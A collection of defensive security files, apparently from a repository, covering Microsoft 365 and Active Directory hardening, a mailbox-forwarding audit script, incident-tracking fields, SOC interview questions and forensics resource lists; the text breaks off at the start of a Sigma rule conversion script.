- Go to the Azure Active Directory Admin Portal and click on Password Reset.
- Enable for All users, or use Selected to exclude some user groups.
- In the Authentication Methods tab, define the settings users may put in place. These may be the same as those selected for MFA, with the addition of "Security questions".
- In the Registration tab, define the number of days before users are asked to confirm their recovery options, and also enable alerts if you want to know when someone has reset their password.

# Do Not Expire Passwords

Compliance Controls
- FedRAMP Moderate; Control AC-7(a)
- NIST 800-171; Control 3.1.8
- NIST 800-53; Control AC-7(a)

# Delete/block accounts not used in last 30 days

Compliance Controls
- FedRAMP Moderate; Control AC-2(3)
- NIST 800-53; Control AC-2(3)

# Designate More than 1 Global Admin but fewer than 5

Compliance Controls
- CSA CCM301; Control DSI-02
- FedRAMP Moderate; Control IA-3
- GDPR; Control 6.6.5
- ISO 27018:2014; Control C.9.4.2, Control A.10.8
- NIST 800-171; Control 3.5.2
- NIST 800-53; Control IA-3

# Do not allow users to grant consent to unmanaged applications

Compliance Controls
- FedRAMP Moderate; Control CM-8(3)(a)
- NIST 800-53; Control CM-8(3)(a)
- NIST CSF; Control ID.AM-1

# Additional Resources
- https://usc.pax8.com/resource/display/33588
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults
-------------------------------------------------------------------------------- /hardening/microsoft-365-exchange.md: --------------------------------------------------------------------------------
- [Enable Email Encryption](#enable-email-encryption)
- [Enable Client Rules Forwarding Blocks](#enable-client-rules-forwarding-blocks)
- [Set Outbound Spam Notifications](#set-outbound-spam-notifications)
- [Do not allow mailbox delegation](#do-not-allow-mailbox-delegation)
- [Set up Connection Filtering](#set-up-connection-filtering)
- [Spam Filtering](#spam-filtering)
- [Malware Protection](#malware-protection)
- [Anti-Phishing Policy](#anti-phishing-policy)
- [Configure Enhanced Filtering](#configure-enhanced-filtering)
- [Configure ATP Safe Links and Safe Attachments Policy](#configure-atp-safe-links-and-safe-attachments-policy)
- [Add SPF, DKIM, and DMARC](#add-spf-dkim-and-dmarc)
- [Do not Allow Calendar Details Sharing](#do-not-allow-calendar-details-sharing)
- [Audits](#audits)
- [Additional Resources](#additional-resources)

# Enable Email Encryption

# Enable Client Rules Forwarding Blocks

Compliance Controls
- GDPR; Control 6.8.2
- ISO 27018:2014; Control A.10.2

# Set Outbound Spam Notifications

Compliance Controls
- HIPAA; Control 45 C.F.R. § 164.308(a)(5)(ii)(B)
- NIST 800-171; Control 3.14.2
- NIST 800-53; Control SI-3(a)

# Do not allow mailbox delegation

Compliance Controls
- FedRAMP Moderate; Control AC-2, Control AC-2(3)
- GDPR; Control 6.6.1
- ISO 27018:2014; Control C.9.2
- NIST 800-53; Control AC-2
- NIST CSF; Control DE.CM-1

# Set up Connection Filtering

# Spam Filtering

# Malware Protection

# Anti-Phishing Policy

# Configure Enhanced Filtering

# Configure ATP Safe Links and Safe Attachments Policy

# Add SPF, DKIM, and DMARC

# Do not Allow Calendar Details Sharing

Compliance Controls
- FedRAMP Moderate; Control AC-2(9)
- NIST 800-53; Control AC-2(9)

# Audits
- Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.
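The forwarding part of this audit (and the weekly mailbox forwarding rule review in the auditing file), implemented as an added PowerShell example that is not part of this repository. It assumes the ExchangeOnlineManagement module with an existing Connect-ExchangeOnline session, and the domain names in the usage line are placeholders.

```powershell
# Added example, not part of this repository: review of mailbox forwarding in Exchange Online.
# Assumptions: the ExchangeOnlineManagement module is installed and Connect-ExchangeOnline has
# already been run in this session with an account that can read recipients and inbox rules.

function Get-MailboxForwardingFindings {
    [CmdletBinding()]
    param(
        # Domains you own. Any forwarding target outside this list is flagged External.
        [Parameter(Mandatory)]
        [string[]] $InternalDomains
    )

    $internal = $InternalDomains | ForEach-Object { $_.ToLowerInvariant() }
    $findings = [System.Collections.Generic.List[object]]::new()

    # Pull the SMTP address out of an inbox-rule recipient string such as
    # 'Jane Doe [SMTP:jane@partner.example]'. Internal recipients are rendered with a
    # legacy DN (EX:/o=...) instead, so they resolve to $null and count as internal.
    function Resolve-Smtp([string] $Recipient) {
        if ($Recipient -match 'SMTP:([^\]\s]+)') { return $Matches[1] }
        if ($Recipient -match '^[^@\s]+@[^@\s]+$') { return $Recipient }
        return $null
    }

    function Test-External([string] $Address) {
        if (-not $Address) { return $false }   # unresolved target: treated as internal
        $domain = ($Address -split '@')[-1].ToLowerInvariant()
        return -not ($internal -contains $domain)
    }

    function Add-Finding($Mailbox, $Source, $RuleName, $Target, $KeepCopy) {
        $findings.Add([pscustomobject]@{
            Mailbox  = $Mailbox
            Source   = $Source
            RuleName = $RuleName
            Target   = $Target
            KeepCopy = $KeepCopy
            External = Test-External $Target
        })
    }

    foreach ($mbx in (Get-Mailbox -ResultSize Unlimited)) {
        # 1. Mailbox-level forwarding (set by an admin or through mailbox properties)
        if ($mbx.ForwardingSmtpAddress) {
            Add-Finding $mbx.UserPrincipalName 'MailboxForwarding' $null `
                ($mbx.ForwardingSmtpAddress -replace '^smtp:', '') $mbx.DeliverToMailboxAndForward
        } elseif ($mbx.ForwardingAddress) {
            Add-Finding $mbx.UserPrincipalName 'MailboxForwarding' $null `
                ([string] $mbx.ForwardingAddress) $mbx.DeliverToMailboxAndForward
        }

        # 2. User-created inbox rules that forward or redirect mail (disabled rules included,
        #    since a rule can be re-enabled later without creating a new one)
        $rules = Get-InboxRule -Mailbox $mbx.UserPrincipalName -ErrorAction SilentlyContinue
        foreach ($rule in $rules) {
            $targets = @($rule.ForwardTo) + @($rule.ForwardAsAttachmentTo) + @($rule.RedirectTo) |
                Where-Object { $_ }
            foreach ($t in $targets) {
                $source = if ($rule.Enabled) { 'InboxRule' } else { 'InboxRule(Disabled)' }
                Add-Finding $mbx.UserPrincipalName $source $rule.Name (Resolve-Smtp ([string] $t)) $false
            }
        }
    }

    return $findings
}

# Usage (placeholder domains): list everything that forwards outside the organization.
# Get-MailboxForwardingFindings -InternalDomains 'contoso.com', 'contoso.onmicrosoft.com' |
#     Where-Object External | Sort-Object Source, Mailbox | Format-Table -AutoSize
```

Keep the previous week's output and diff against it; a newly appearing external target or a rule whose name is empty or generic is the usual sign of a compromised mailbox.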
# Additional Resources
- https://usc.pax8.com/resource/display/33588
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults
-------------------------------------------------------------------------------- /hardening/microsoft-365-sharepoint-and-onedrive.md: --------------------------------------------------------------------------------
- [Configure Expiration Time for External Sharing Links](#configure-expiration-time-for-external-sharing-links)
- [Enable Versioning on all SharePoint Online Document Libraries](#enable-versioning-on-all-sharepoint-online-document-libraries)
- [Adopt the OneDrive Sync Client](#adopt-the-onedrive-sync-client)
- [Additional Resources](#additional-resources)

# Configure Expiration Time for External Sharing Links

# Enable Versioning on all SharePoint Online Document Libraries

# Adopt the OneDrive Sync Client

# Additional Resources
- https://usc.pax8.com/resource/display/33588
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults
-------------------------------------------------------------------------------- /hardening/microsoft-365-teams.md: --------------------------------------------------------------------------------
- [Utilize Private Channels](#utilize-private-channels)
- [Block External Access](#block-external-access)
- [Limit Guest Access](#limit-guest-access)
- [Turn off File Sharing and File Storage Options](#turn-off-file-sharing-and-file-storage-options)
- [Block Third-Party Applications](#block-third-party-applications)
- [Restrict Users who can Create Teams Channels](#restrict-users-who-can-create-teams-channels)
- [Set Teams Expiration](#set-teams-expiration)
- [Set up Advanced Threat Protection Policies for Teams](#set-up-advanced-threat-protection-policies-for-teams)
- [Set up App Protection Policies](#set-up-app-protection-policies)
- [Set up Data Loss Prevention Policies](#set-up-data-loss-prevention-policies)
- [Additional Resources](#additional-resources)

# Utilize Private Channels

# Block External Access

# Limit Guest Access

# Turn off File Sharing and File Storage Options

# Block Third-Party Applications

# Restrict Users who can Create Teams Channels

# Set Teams Expiration

# Set up Advanced Threat Protection Policies for Teams

# Set up App Protection Policies

# Set up Data Loss Prevention Policies

# Additional Resources
- https://usc.pax8.com/resource/display/33588
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults
-------------------------------------------------------------------------------- /hardening/microsoft-active-directory.md: --------------------------------------------------------------------------------
- [Domain Controller Redundancy](#domain-controller-redundancy)
- [Ensure Regular Backup of GPOs](#ensure-regular-backup-of-gpos)
- [Ensure the Directory Services Restore Mode (DSRM) password is Set](#ensure-the-directory-services-restore-mode-dsrm-password-is-set)
- [Windows Firewall](#windows-firewall)
- [RDP](#rdp)
- [Microsoft Local Administrator Password Solution (LAPS)](#microsoft-local-administrator-password-solution-laps)
- [Least Privilege and Tiered Admin](#least-privilege-and-tiered-admin)
- [Service Account Restrictions](#service-account-restrictions)
- [Protected Users Security Group](#protected-users-security-group)
- [Eliminate Older Operating Systems](#eliminate-older-operating-systems)
- [Set GPO to Reprocess Even if Not Changed](#set-gpo-to-reprocess-even-if-not-changed)
- [Group Managed Service Accounts](#group-managed-service-accounts)
- [Additional Resources](#additional-resources)

# Domain Controller Redundancy
- Ensure there is a domain controller that can be quickly taken offline if isolation is needed, so that a rebuild can be avoided. Preferably one that holds FSMO roles.
- ```netdom query fsmo```

# Ensure Regular Backup of GPOs
- ```backup-gpo -domain "domain.local" -all -path "c:\temp\gpo-backups"```

# Ensure the Directory Services Restore Mode (DSRM) password is Set
Set it to a known value on all Domain Controllers. The steps will need to be initiated on each Domain Controller:
```
PS C:\Windows\system32> ntdsutil
C:\Windows\System32\ntdsutil.exe: set dsrm password
Reset DSRM Administrator Password: reset password on server null
Please type password for DS Restore Mode Administrator Account: ***
Please confirm new password: ***
Password has been set successfully.
```

# Windows Firewall
- Maintain at least a workstation and a server Group Policy Object (GPO) to control the Windows Firewall
  - Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security
- Generally, it is best to limit the following scenarios
  - Workstation-to-workstation communication
  - Server-to-server communication
  - Server-to-workstation communication
- At a minimum, consider restricting the following ports where possible
  - Server Message Block (SMB) (TCP/445, TCP/135, TCP/139)
  - Remote Desktop Protocol (RDP) (TCP/3389)
  - Windows Remote Management (WinRM) (TCP/80, TCP/5985, TCP/5986)
  - Windows Management Instrumentation (WMI) (Dynamic/DCOM)
- Consider setting "Apply local firewall rules" and "Apply local connection security rules" to "No" for all profiles

# RDP
- Network Level Authentication (NLA) provides an extra layer of pre-authentication before a connection is established. NLA is also useful for protecting against brute force attacks, which often target open internet-facing RDP servers.
  - Computer Configuration > Policies > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host > Security > Require user authentication for remote connections by using Network Level Authentication

# Microsoft Local Administrator Password Solution (LAPS)
- Deploy LAPS to avoid having the same local administrator password on every system on the network. Otherwise, pivoting from a single compromised system is extremely easy for an adversary.
- https://www.microsoft.com/en-us/download/details.aspx?id=46899

# Least Privilege and Tiered Admin
- Maintain and enforce use of separate user and admin accounts.
- Maintain separate admin accounts for workstation, server, and domain admin use to minimize lateral movement that traverses system types. As a result, any attempted use of an account in the wrong environment is an immediate red flag.

# Service Account Restrictions
- Restrict service accounts to the absolute minimum rights needed to perform their tasks. Most of the settings below can be set on one or more service accounts
  - Deny access to this computer from the network
  - Deny log on as a batch job
  - Deny log on locally
  - Deny log on through Terminal Services
- All settings above can be found at the GPO path below
  - Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment
- Service accounts that can be restricted to a single system can have this enforced via the Active Directory account's properties > Account tab > "Log On To" button

# Protected Users Security Group
- Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2 and above have this group, which applies the following restrictions to the member accounts.
  - The Kerberos ticket granting ticket (TGT) expires after 4 hours, rather than the normal 10-hour default setting.
  - Only Kerberos authentication is used (NTLM authentication is disabled).
  - Cached credentials are blocked (a Domain Controller must be reachable to authenticate).
  - WDigest authentication is disabled.
  - Kerberos with AES encryption is enforced for pre-authentication.
  - The "Account is sensitive and cannot be delegated" setting, as seen in Active Directory Users and Computers, is enforced.
- Note: requires the domain functional level to be Windows Server 2012 R2 or higher.
- Note: NO service account should be added to the "Protected Users" security group, as authentication will fail.
- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn466518(v=ws.11)?redirectedfrom=MSDN

# Eliminate Older Operating Systems
- Find any means necessary to eliminate Windows 7 / Server 2008 and older systems from the network.
- For any unavoidable older OSes, apply some additional restrictions
  - Computer Configuration > Policies > Administrative Templates > MS Security Guide > WDigest Authentication > DISABLE

# Set GPO to Reprocess Even if Not Changed
- Many attackers will manually change settings on endpoints by directly modifying the registry. Even on endpoints where registry settings are automatically set via GPO, it is recommended to enforce the Group Policy settings and configure automatic policy reprocessing for the configured settings on a scheduled basis.
  - Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure **security** policy processing – Enabled - Process even if the GPOs have not changed
  - Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure **registry** policy processing – Enabled - Process even if the GPOs have not changed

# Group Managed Service Accounts
- https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview
- https://blog.stangroome.com/2013/07/28/avoid-password-management-with-group-managed-service-accounts/

# Additional Resources
- Mandiant Whitepaper: Ransomware Protection and Containment Strategies
  - https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf
- SANS course and public materials
- https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material
- https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model
-------------------------------------------------------------------------------- /hardening/microsoft-windows-dns.md: --------------------------------------------------------------------------------
- Open the Domain Name System Microsoft Management Console (DNS MMC) snap-in.
- Click Start → Programs → Administrative Tools, then select DNS.
- From the DNS Server, right-click the server and select the Properties submenu.
- Click the Debug Logging tab, then select Log packets for debugging.
- Ensure that the Incoming, UDP, Queries/Transfers, and Request checkboxes are selected.
- File location is: systemroot\System32\Dns\Dns.log
-------------------------------------------------------------------------------- /hardening/microsoft-windows.md: --------------------------------------------------------------------------------
- [Windows Firewall](#windows-firewall)
- [User Account Control and Virtualization](#user-account-control-and-virtualization)
- [Credential Guard](#credential-guard)
- [Limit Cached Credential Count](#limit-cached-credential-count)
- [Resources](#resources)

Note that [Active Directory](microsoft-active-directory.md) GPO should be used as much as possible over individually targeting Windows systems.

# Windows Firewall
This can be controlled via [network](network.md) devices, Active Directory GPO, and/or via Windows Firewall directly on endpoints.
- Systems should NOT be allowed to communicate with each other or outbound to workstations unless absolutely necessary.
- Generally, it is best to limit the following scenarios
  - Workstation-to-workstation communication
  - Server-to-server communication
  - Server-to-workstation communication
- At a minimum, consider restricting the following ports where possible
  - Server Message Block (SMB) (TCP/445, TCP/135, TCP/139)
  - Remote Desktop Protocol (RDP) (TCP/3389)
  - Windows Remote Management (WinRM) (TCP/80, TCP/5985, TCP/5986)
  - Windows Management Instrumentation (WMI) (Dynamic/DCOM)
- Consider setting "Apply local firewall rules" and "Apply local connection security rules" to "No" for all profiles

# User Account Control and Virtualization
- https://www.microsoftpressstore.com/articles/article.aspx?p=2228450&seqNum=9

# Credential Guard
- https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-requirements

# Limit Cached Credential Count
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount

# Resources
- Mandiant Whitepaper: Ransomware Protection and Containment Strategies
  - https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf
-------------------------------------------------------------------------------- /hardening/network.md: --------------------------------------------------------------------------------
- [Endpoint Segmentation](#endpoint-segmentation)
- [Threat Intelligence-Based Blocking](#threat-intelligence-based-blocking)
- [Services](#services)
  - [Remote Desktop Protocol](#remote-desktop-protocol)
- [Maintain Network Documentation](#maintain-network-documentation)
- [Establish Baselines](#establish-baselines)
- [Resources](#resources)

# Endpoint Segmentation
Implement and ensure robust network segmentation between networks and functions to reduce the spread of ransomware. Define a demilitarized zone that eliminates unregulated communication between networks.
- Endpoints should NOT be allowed to communicate with each other unless absolutely necessary. This peer-level communication can be controlled via [Private VLANs](https://en.wikipedia.org/wiki/Private_VLAN) (AKA port isolation) on switches.
- Generally, it is best to limit the following scenarios
  - Workstation-to-workstation communication
  - Server-to-server communication
  - Server-to-workstation communication
- At a minimum, consider restricting the following ports where possible
  - Server Message Block (SMB) (TCP/445, TCP/135, TCP/139)
  - Remote Desktop Protocol (RDP) (TCP/3389)
  - Windows Remote Management (WinRM) (TCP/80, TCP/5985, TCP/5986)
  - Windows Management Instrumentation (WMI) (Dynamic/DCOM)

# Threat Intelligence-Based Blocking
Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses.
- Ideally performed automatically with a curated threat intelligence feed, while also allowing for management of a manual block/allowlist.

# Services
## Remote Desktop Protocol
- RDP was designed to be used internally and should never be exposed to the Internet. Instead, expose a VPN to the Internet and make RDP accessible internally only.
- After assessing risks, if Internet-facing RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication.

# Maintain Network Documentation
Develop/update network maps to ensure a full accounting of all equipment that is connected to the network.
- Remove any equipment from networks that is not required to conduct operations, to reduce the attack surface malicious actors can exploit.

# Establish Baselines
Establish baselines of network traffic, application execution, and account authentication.
Use these baselines to enforce an "allowlist" philosophy rather than denying known-bad IOCs. Ensure monitoring and detection tools and procedures are primarily behavior-based, rather than IOC-centric.

# Resources
- Mandiant Whitepaper: Ransomware Protection and Containment Strategies
  - https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-193a?mc_cid=78cd2ac95a&mc_eid=UNIQID
-------------------------------------------------------------------------------- /hardening/remote-access.md: --------------------------------------------------------------------------------
- Utilize blocklisting and allowlisting to limit remote access to users with a verified business and/or operational need.
- Ensure that all remote access technologies have logging enabled, and regularly audit these logs to identify instances of unauthorized access.
- Audit networks for systems using remote access services.
- Close unneeded network ports associated with remote access services (e.g., RDP – Transmission Control Protocol [TCP] Port 3389).
- When configuring access control for a host, utilize custom settings to limit the access a remote party can attempt to acquire.
-------------------------------------------------------------------------------- /hardening/software-manufacturers.md: --------------------------------------------------------------------------------
# Eliminate default passwords

# Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers
- In conjunction with customers, to understand how response teams use logs to investigate incidents.

# Resources
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-193a?mc_cid=78cd2ac95a&mc_eid=UNIQID
-------------------------------------------------------------------------------- /hardening/web-security.md: --------------------------------------------------------------------------------
# Threat Intelligence-Based Blocking
- Implement a URL blocklist and/or allowlist to prevent users from accessing malicious websites. Ideally sites are categorized, including Uncategorized, Newly Registered, and Known Malicious (or similar).
-------------------------------------------------------------------------------- /incident-tracking.md: --------------------------------------------------------------------------------
Tables and their fields are listed below.
- Fields are focused on enabling information sharing between analysts and on producing useful metrics.
- Fields with dropdowns have their selection values listed in-line beneath them.
- Tables may "lookup" entries in another table to establish a relationship.
- [Incidents](#incidents)
- [Indicator of Compromise](#indicator-of-compromise)
- [Adversary](#adversary)
- [Software](#software)
- [Affected Systems](#affected-systems)
- [Affected Users](#affected-users)
- [Attack Techniques](#attack-techniques)
- [Emails](#emails)
- [Use Cases/Plays](#use-casesplays)
- [Work Log](#work-log)
- [Mitigations](#mitigations)
- [Owner](#owner)
- [Signature](#signature)
- [Hunts](#hunts)
- [Hunt Backlog](#hunt-backlog)

# Incidents
- Adversary (Lookup)
- Signature (Lookup)
- Use Cases/Plays (Lookup)
- Attack Techniques (Lookup)
- Mitigations (Lookup)
- Affected Software (Lookup)
- Affected Systems (Lookup)
- Affected Users (Lookup)
- Emails (Lookup)
- Related Incidents (Lookup)
- Work Log (Lookup)
- Resolutions (Lookup)
- Owner (Lookup)
- Date Activity Started
- Date Activity Stopped
- Date Client Notified
- Date Closed
- Closed By
- Date Reported
- Reported By
- Date Reviewed
- Reviewed By
- Date Last Updated
- Last Updated By
- Date Created
- Created By
- Title/Subject
- Executive Summary
- Internal Comments
- Origination
  - Threat Hunting
  - SIEM Correlation
  - Alarm from EDR
  - Alarm from AV
  - Alarm from IDS/IPS
  - Reported by Internal User
  - Reported by Third Party
  - Reported by Adversary
  - Audit
- Origination Details
- External Related IDs
- Priority
  - Emergency
  - High
  - Medium
  - Low
- Outcome
  - True Positive
  - False Positive
  - Benign
  - Indeterminate
- Root Cause
  - Training/Awareness
  - Policy Violation
  - Missing Patch
  - Zero Day
  - Configuration Weakness
  - Power Failure
  - Hardware Failure
  - Software Failure
  - Sabotage
- Scope of Compromise
  - Initial Access
  - Execution
  - Persistence
  - Privilege Escalation
  - Defense Evasion
  - Credential Access
  - Discovery
  - Lateral Movement
  - Collection
  - Command and Control
  - Exfiltration
  - Impact
  - No Compromise
- Status
  - New
  - In Progress
  - Closed
  - Pending
  - On Hold
  - Cancelled
  - Duplicate
- Escalation Level
  - Level 1
  - Level 2
  - Level 3
  - External
- Attachments
- Change Log

# Indicator of Compromise
- IP
- Hostname
- Domain Name
- Date Last Observed

# Adversary
- Name
- Aliases
- References
- Signatures (Lookup)
- Attack Techniques (Lookup)

# Software
- Vendor
- Product
- Version

# Affected Systems
- Internal IP(s)
- Public IP(s)
- MAC(s)
- Hostname
- User (Lookup)
- Location
- Platform
- Operating System
- Operating System Version

# Affected Users
- Name
- Email
- Phone
- Username

# Attack Techniques
- ID
- Name
- URL

# Emails
- Subject
- Sender
- Recipients
- Body
- Attachments
- Date Sent
- Header

# Use Cases/Plays
- Title
- Link

# Work Log
- Owner (Lookup)
- Date and Time of Work
- Title
- Details

# Mitigations
- Title
- Description

# Owner
- Username
- Full Name

# Signature
- Name
- Use Case (Lookup)
- Event Feed (Lookup)
- Adversaries (Lookup)
- Attack Techniques (Lookup)
- Date Last Reviewed
- Date Last Validated
- Severity
- Fidelity
- Status
- References
- Attack Simulation
- Notes
- Change Log
- Sample Source Events
- Pseudologic
- Deployed Logic
- Sigma Logic

# Hunts
- Name - Hypothesis statement - what is being hunted for
- Description - Details to provide context surrounding who, what, when, where, how, etc. Anticipate questions and answer them here.
- Data Sources - Types of data to be analyzed and where they come from
- Duration - Dataset minimum and maximum age
- Scope - which systems, assets, etc. should be included
- MITRE Tactics (Lookup) - if any are applicable
- MITRE Techniques (Lookup) - if any are applicable
- Adversary Groups (Lookup) - or related recognizable names like botnet names, ransomware-as-a-service names, etc.
- Script - how the hunt is actually conducted. May be geared toward a specific tool, but should have enough detail to allow reproduction in another tool. Should include specific techniques and detail sufficient for another hunter to reproduce the hunt.
- Resources (links, report names)

# Hunt Backlog
- Hunt (Lookup)
- Name (hypothesis or trigger)
- Hunt Model - Reactive or Proactive
- Date Performed
- Hunters
- Result (proven, disproven, inconclusive)
- Lessons Learned
- Script (how this specific hunt was conducted)
- Count of incidents created
- Count of use cases/signatures updated
- Threat intelligence output produced
- Security recommendations produced
- Vulnerability findings produced
- Knowledge gained
- Visibility gained
- New analysis techniques extracted
- New data sources obtained
- Time Spent
-------------------------------------------------------------------------------- /interview-questions.md: --------------------------------------------------------------------------------
# General
- Why are you looking for work?
- Could you describe the perfect job for you at this point in your career?
- If you were given someone to mentor, how would you go about training them?
- As technology develops and processes and requirements change, how do you ensure your team is kept up to date and delivers a uniform, professional service?
- Can you give an example of a task you automated to save time or speed up work?
- Can you give an example of a signature that stemmed from a threat hunt you performed?
- Can you explain the MITRE ATT&CK framework and how you've leveraged it?
- If you were given a blank check to set up a SOC with the primary responsibility of detecting and responding to security incidents, what would your setup look like?
  - Technologies used? (AV, EDR, IDS, SIEM, ticketing, etc.)
  - Logs pulled?
  - How do you make use of logs?

# Forensics
- If you could run one tool or suite against a dead box in a forensics case, what would you choose and why?
- What is your go-to approach for developing a timeline for an executive report?
- What is ShimCache/AppCompatCache?
  - Application compatibility artifact
  - Only contains info up to the most recent shutdown – the rest is stored in memory
  - Chronologically stored with the most recent at the top
- What is AmCache?
  - C:\Windows\appcompat\Programs\Amcache.hve
  - Stores metadata related to PE execution
  - Records SHA1 and full file path
- What makes prefetch so valuable?
- Have you ever analyzed the SRUM before?
- What is MRUListEx?
- What is a Mutex/Mutant?
  - Indicator used by malware to determine if a host has been infected before
  - Digital vaccine

# Incident Response
- How would you investigate an incident where a webserver was found to potentially have a webshell?
- What are some key sensitive files on a Windows box?
    - SAM file
    - User Registry Hives
- What would you do in a potential ransomware incident? E.g. a company server is online and confirmed to have been hit with ransomware. You're on call and now have to direct the situation: what do you do first?
--------------------------------------------------------------------------------
/mitigation-categories.md:
--------------------------------------------------------------------------------
- Account Use Policies
- Active Directory Configuration
- Antivirus/Antimalware
- Application Developer Guidance
- Application Isolation and Sandboxing
- Audit
- Behavior Prevention on Endpoint
- Boot Integrity
- Code Signing
- Credential Access Protection
- Data Backup
- Data Loss Prevention
- Disable or Remove Feature or Program
- Do Not Mitigate
- Encrypt Sensitive Information
- Environment Variable Permissions
- Execution Prevention
- Exploit Protection
- Filter Network Traffic
- Limit Access to Resource Over Network
- Limit Hardware Installation
- Limit Software Installation
- Multi-factor Authentication
- Network Intrusion Prevention
- Network Segmentation
- Operating System Configuration
- Password Policies
- Pre-compromise
- Privileged Account Management
- Privileged Process Integrity
- Remote Data Storage
- Restrict File and Directory Permissions
- Restrict Library Loading
- Restrict Registry Permissions
- Restrict Web-Based Content
- Software Configuration
- SSL/TLS Inspection
- Threat Intelligence Program
- Update Software
- User Account Control
- User Account Management
- User Training
- Vulnerability Scanning


# Resources
- See MITRE's mitigations at https://attack.mitre.org/mitigations/enterprise/
--------------------------------------------------------------------------------
/osintel.md:
--------------------------------------------------------------------------------
# RSS
- https://msrc-blog.microsoft.com/feed
- https://www.cisa.gov/uscert/ncas/alerts.xml
- https://www.cisa.gov/uscert/ncas/analysis-reports.xml
- https://www.cisa.gov/uscert/ncas/bulletins.xml
- https://www.cisa.gov/uscert/ncas/current-activity.xml
- https://thedfirreport.com/feed/
- https://adsecurity.org/?feed=rss2
- https://cqureacademy.com/feed
- https://dfir.blog/rss/
- https://feeds.feedburner.com/IrongeeksSecuritySite
- https://laskowski-tech.com/feed
- https://medium.com/feed/@Cyb3rWard0g
- https://ponderthebits.com/feed/
- https://posts.specterops.io/feed
- https://www.us-cert.gov/ncas/alerts.xml
- https://www.welivesecurity.com/category/cybercrime,malware,cybersecurity,password,scams,vulnerability,mobile-security,threat-reports/feed/
- https://www.zerodayinitiative.com/blog?format=rss


# Subscriptions
- [CIS Advisories](https://learn.cisecurity.org/ms-isac-subscription)
- [Microsoft Technical Security Notifications](https://www.microsoft.com/en-us/msrc/technical-security-notifications)
- [CISA Alerts](https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138)


# Other
- [CISA Directives](https://www.cisa.gov/directives)
- [CISA Known-Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities)
--------------------------------------------------------------------------------
/response-tools-resources.md:
--------------------------------------------------------------------------------
# Free Resources

## Curated Lists
- https://github.com/sbilly/awesome-security
- https://github.com/rshipp/awesome-malware-analysis
- https://github.com/cugu/awesome-forensics

## Guides and FAQ
- NIST Computer Security Incident Handling Guide (800-61r2)
    - https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final

## Forms and Templates
- Security Policy Templates
    - https://www.sans.org/information-security-policy/?per-page=100

## Reference Materials and Cheat Sheets
- Jai Minton's DFIR Cheat Sheet
    - https://www.jaiminton.com/cheatsheet/DFIR/#persistence-and-automatic-loadrun-reg-keys
- CISA Incident Response Series
    - https://www.youtube.com/playlist?list=PL-BF3N9rHBLJaSbTRPyWYj56f0m2uDQD7
- s0cm0nkey's Security Reference Guide
    - https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/

## Live Forensics Tools
- Google Rapid Response (GRR)
    - https://github.com/google/grr
- Meerkat
    - https://github.com/TonyPhipps/Meerkat

## Offline Forensics Tools
- log2timeline & Plaso
    - https://github.com/log2timeline/plaso
    - https://github.com/mark-hallman/plaso_filters/blob/master/Plaso_Filtering_Cheat-Sheet_V1.03.pdf
    - https://www.sans.org/blog/digital-forensics-sift-ing-cheating-timelines-with-log2timeline/
    - https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html
- Timesketch
    - http://timesketch.org/
    - https://github.com/google/timesketch
- Autopsy
    - https://www.autopsy.com/
- Timeline Explorer
    - https://ericzimmerman.github.io/#!index.md
- apfs-fuse
    - https://github.com/sgan81/apfs-fuse
- Hayabusa
    - https://github.com/Yamato-Security/hayabusa
- Takajo
    - https://github.com/Yamato-Security/takajo

# Non-Free Resources

## Courses
- SANS SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling
    - https://www.sans.org/cyber-security-courses/hacker-techniques-incident-handling/
- SANS SEC555: SIEM with Tactical Analytics
    - https://www.sans.org/cyber-security-courses/siem-with-tactical-analytics/
- SANS FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics
    - https://www.sans.org/cyber-security-courses/advanced-incident-response-threat-hunting-training/
--------------------------------------------------------------------------------
/sigma/Copy-SplunkSigma-Sysmon1-to-4688.ps1:
--------------------------------------------------------------------------------
function Copy-Sysmon1-to-4688 {
    <#
    .SYNOPSIS
        Takes a savedsearches.conf and looks for rules based on Sysmon Event ID 1, then copies them to another file.
        Then, replaces key values in the rules to work with Windows Security Event ID 4688.

    .DESCRIPTION
        Takes a savedsearches.conf and looks for rules based on Sysmon Event ID 1, then copies them to another file.
        Then, replaces key values in the rules to work with Windows Security Event ID 4688.

    .EXAMPLE
        cd c:\path\to\savedsearches
        Copy-Sysmon1-to-4688

    .EXAMPLE
        Copy-Sysmon1-to-4688 -inputFile c:\savedsearches.conf

    .EXAMPLE
